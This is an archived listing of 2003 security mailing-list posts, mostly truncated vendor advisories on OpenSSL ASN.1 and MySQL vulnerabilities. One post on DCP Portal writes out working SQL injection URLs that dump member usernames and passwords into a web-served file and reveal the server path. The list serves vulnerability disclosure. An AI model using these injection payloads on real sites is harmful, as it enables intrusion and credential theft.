Daniel Ahlberg | 1 Oct 2003 16:48

GLSA: openssl (200309-19)


---------------------------------------------------------------------
GENTOO LINUX SECURITY ANNOUNCEMENT 200309-19
---------------------------------------------------------------------

          PACKAGE : openssl
          SUMMARY : vulnerabilities in ASN.1 parsing
             DATE : 2003-10-01 14:48 UTC
          EXPLOIT : remote
     GENTOO BUG # : 30001
              CVE : CAN-2003-0545 CAN-2003-0543 CAN-2003-0544

---------------------------------------------------------------------

DESCRIPTION

quote from OpenSSL advisory:

"1. Certain ASN.1 encodings that are rejected as invalid by the parser
can trigger a bug in the deallocation of the corresponding data
structure, corrupting the stack. This can be used as a denial of service
attack. It is currently unknown whether this can be exploited to run
malicious code. This issue does not affect OpenSSL 0.9.6.

2. Unusual ASN.1 tag values can cause an out of bounds read under
certain circumstances, resulting in a denial of service vulnerability.

3. A malformed public key in a certificate will crash the verify code if
it is set to ignore public key decoding errors. Public key decode errors
are not normally ignored, except for debugging purposes, so this is
(Continue reading)

Sebastian Krahmer | 1 Oct 2003 13:53

SuSE Security Announcement: mysql (SuSE-SA:2003:042)


______________________________________________________________________________

                        SuSE Security Announcement

        Package:                mysql
        Announcement-ID:        SuSE-SA:2003:042
        Date:                   Wed Oct  1 12:12:38 CEST 2003
        Affected products:      7.2, 7.3, 8.0, 8.1, 8.2
                                SuSE Linux Connectivity Server
                                SuSE Linux Enterprise Server 7, 8
                                SuSE Linux Office Server
                                UnitedLinux 1.0
        Vulnerability Type:     remote code execution
        Severity (1-10):        5
        SuSE default package:   no
        Cross References:       -

    Content of this advisory:
        1) security vulnerability resolved: Buffer overflow in mysql.
           problem description, discussion, solution and upgrade information
        2) pending vulnerabilities, solutions, workarounds:
            - OpenSSL
        3) standard appendix (further information)

______________________________________________________________________________

1)  problem description, brief discussion, solution, upgrade information

    A remotely exploitable buffer overflow within the authentication code
(Continue reading)

debian-security-announce | 1 Oct 2003 12:43

[Full-Disclosure] [SECURITY] [DSA-393-1] New OpenSSL packages correct denial of service issues


--------------------------------------------------------------------------
Debian Security Advisory DSA 393-1                     security <at> debian.org
http://www.debian.org/security/                              Michael Stone
October 1, 2003                         http://www.debian.org/security/faq
--------------------------------------------------------------------------

Package        : openssl
Vulnerability  : denial of service
Problem-Type   : remote
Debian-specific: no
CVE Ids        : CAN-2003-0543 CAN-2003-0544

Dr. Stephen Henson (steve <at> openssl.org), using a test suite provided by
NISCC (www.niscc.gov.uk), discovered a number of errors in the OpenSSL
ASN1 code.  Combined with an error that causes the OpenSSL code to parse
client certificates even when it should not, these errors can cause a
denial of service (DoS) condition on a system using the OpenSSL code, 
depending on how that code is used. For example, even though apache-ssl
and ssh link to OpenSSL libraries, they should not be affected by this
vulnerability. However, other SSL-enabled applications may be
vulnerable and an OpenSSL upgrade is recommended.

For the current stable distribution (woody) these problems have been
fixed in version 0.9.6c-2.woody.4

For the unstable distribution (sid) these problems have been fixed in
version 0.9.7c-1

We recommend that you update your openssl package. Note that you will
(Continue reading)

MDKSA-2003:098 - Updated openssl packages fix vulnerabilities


________________________________________________________________________

                Mandrake Linux Security Update Advisory
________________________________________________________________________

Package name:           openssl
Advisory ID:            MDKSA-2003:098
Date:                   September 30th, 2003

Affected versions:      8.2, 9.0, 9.1, 9.2, Corporate Server 2.1,
                        Multi Network Firewall 8.2
________________________________________________________________________

Problem Description:

 Two bugs were discovered in OpenSSL 0.9.6 and 0.9.7 by NISCC. The
 parsing of unusual ASN.1 tag values can cause OpenSSL to crash, which
 could be triggered by a remote attacker by sending a carefully-crafted
 SSL client certificate to an application.  Depending upon the
 application targeted, the effects seen will vary; in some cases a DoS
 (Denial of Service) could be performed, in others nothing noticeable
 or adverse may happen.  These two vulnerabilities have been assigned
 CAN-2003-0543 and CAN-2003-0544.

 Additionally, NISCC discovered a third bug in OpenSSL 0.9.7.  Certain
 ASN.1 encodings that are rejected as invalid by the parser can trigger
 a bug in deallocation of a structure, leading to a double free.  This
 can be triggered by a remote attacker by sending a carefully-crafted
 SSL client certificate to an application.  This vulnerability may be
(Continue reading)

Slackware Security Team | 1 Oct 2003 07:48

[slackware-security] OpenSSL security update (SSA:2003-273-01)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[slackware-security]  OpenSSL security update (SSA:2003-273-01)

Upgraded OpenSSL packages are available for Slackware 8.1, 9.0,
9.1, and -current.  These fix problems with ASN.1 parsing which
could lead to a denial of service.  It is not known whether the
problems could lead to the running of malicious code on the
server, but it has not been ruled out.

We recommend sites that use OpenSSL upgrade to the fixed packages
right away.

Here are the details from the Slackware 9.1 ChangeLog:
+--------------------------+
Tue Sep 30 16:16:35 PDT 2003
patches/packages/openssl-0.9.7c-i486-1.tgz:  Upgraded to OpenSSL 0.9.7c.
patches/packages/openssl-solibs-0.9.7c-i486-1.tgz:  Upgraded to OpenSSL 0.9.7c.
  This update fixes problems with OpenSSL's ASN.1 parsing which could lead to
  a denial of service.  It is not known whether the problems could lead to the
  running of malicious code on the server, but it has not been ruled out.
  For detailed information, see OpenSSL's security advisory:
    http://www.openssl.org/news/secadv_20030930.txt
  We recommend sites that use OpenSSL upgrade to the fixed packages right away.
  (* Security fix *)
+--------------------------+

WHERE TO FIND THE NEW PACKAGES:
(Continue reading)


Cisco Security Advisory: SSL Implementation Vulnerabilities


          Cisco Security Advisory: SSL Implementation Vulnerabilities

Revision 1.0

  For Public Release 2003 September 30 at 2330 GMT

     ----------------------------------------------------------------------

Contents

     Summary
     Affected Products
     Details
     Impact
     Software Versions and Fixes
     Obtaining Fixed Software
     Workarounds
     Exploitation and Public Announcements
     Status of This Notice: INTERIM
     Distribution
     Revision History
     Cisco Security Procedures

     ----------------------------------------------------------------------

Summary

   New vulnerabilities in the OpenSSL implementation for SSL
   have been announced.
(Continue reading)

Lifo Fifo | 1 Oct 2003 14:08

DCP Portal - 5.5 holes


Never use this product if you have turned off magic_quotes_gpc. And this product won't work anyway if you
have turned off register_globals.

All the files in the product don't check for integrity of variables. You can easily exploit this using some
SQL Injection techniques. For example, if you want to get username/password of all the users, you can
exploit advertiser.php.

Open it like,

http://localhost/dcp/advertiser.php?adv_logged=1&username=1&password=qwe' or 1=1 UNION select
uid,name,password,surname,job,email from dcp5_members into outfile 'c:/apache2/htdocs/dcpad.txt

This is for windows, if web-server is running on *nix, then you could enter something like,

http://localhost/dcp/advertiser.php?adv_logged=1&username=1&password=qwe' or 1=1 UNION select
uid,name,password,surname,job,email from dcp5_members into outfile '/var/www/html/dcpad.txt

In these cases, you will need to enter the absolute path. For that, run the following

http://localhost/dcp/advertiser.php?adv_logged=1&username=1&password=' and that will show the
path to the server if they have turned on display_errors in php.ini.

That's all ! Notice that here we are using UNION function in query. For that, the host should be running
version MySQL 4.x. Well, if it's not running 4.x, No problem, we have another file !

This time it's lostpassword.php.

Open it like,

(Continue reading)

steve | 1 Oct 2003 10:06

Re: Local stackbased overflow found for silly Poker v0.25.5 (advisory + poc exploit)

On Wed, Oct 01, 2003 at 12:08:27AM +0200, demz wrote:

> Local stackbased overflow found in sill Poker v0.25.5
> silly Poker contains an $HOME environment variable stack overflow,
> this can be exploited very simple to execute arbitrary code with gid=games
> privileges.

  I reported this bug to the sillypoker maintainer 12 days ago as you can
 see here:

 	http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=211611

  However your analysis is incorrect, sillypoker isn't installed
 setgid(games) upon either the Debian Stable or the Debian Unstable
 distribution.

Steve
--

dhtml | 1 Oct 2003 16:54

NINCOMPOOPERY OF MICROSOFT

"Hackers are criminals" Most, he notes, release their malicious code
after patches for Microsoft software have been released, meaning that
they are simply reverse engineering to exploit security weaknesses or
holes in software. - Microsoft CEO Steve Ballmer 

'ninkum`poop [n]  a stupid foolish person See Also: simple, simpleton

Microsoft has claimed that the majority of the security bugs reported
by the company’s software users have been traced back to the code provided
by the third party software vendors

"Almost 90 per cent of the problems, that are reported by the users as
part of our automated feedback system, come from the code that is not
provided by Microsoft." - Chief Technology Officer Craig Mundie

http://www.internetwk.com/breakingNews/showArticle.jhtml?articleID=15200897

http://www.financialexpress.com/fe_full_story.php?content_id=43039

BG

Concerned about your privacy? Follow this link to get
FREE encrypted email: https://www.hushmail.com/?l=2

Free, ultra-private instant messaging with Hush Messenger
https://www.hushmail.com/services.php?subloc=messenger&l=434

Promote security and make money with the Hushmail Affiliate Program: 
https://www.hushmail.com/about.php?subloc=affiliate&l=427

(Continue reading)

Thomas Biege | 1 Oct 2003 19:19

SuSE Security Announcement: openssl (SuSE-SA:2003:043)


______________________________________________________________________________

                        SuSE Security Announcement

        Package:                openssl
        Announcement-ID:        SuSE-SA:2003:043
        Date:                   Wednesday, Oct 1st 2003 16:12 MET
        Affected products:      7.2, 7.3, 8.0, 8.1, 8.2, 9.0
                                SuSE Linux Database Server,
                                SuSE eMail Server III, 3.1
                                SuSE Linux Enterprise Server 7/8,
                                SuSE Linux Firewall on CD/Admin host
                                SuSE Linux Connectivity Server
                                SuSE Linux Office Server
        Vulnerability Type:     remote denial-of-service
        Severity (1-10):        5
        SuSE default package:   yes
        Cross References:       CAN-2003-0543
                                CAN-2003-0544
                                CAN-2003-0545

    Content of this advisory:
        1) security vulnerability resolved:
            - problems with ASN.1 encoding
            - accepting client certificates even if disabled
           problem description, discussion, solution and upgrade information
        2) pending vulnerabilities, solutions, workarounds:
            - whois
            - gdm2
(Continue reading)
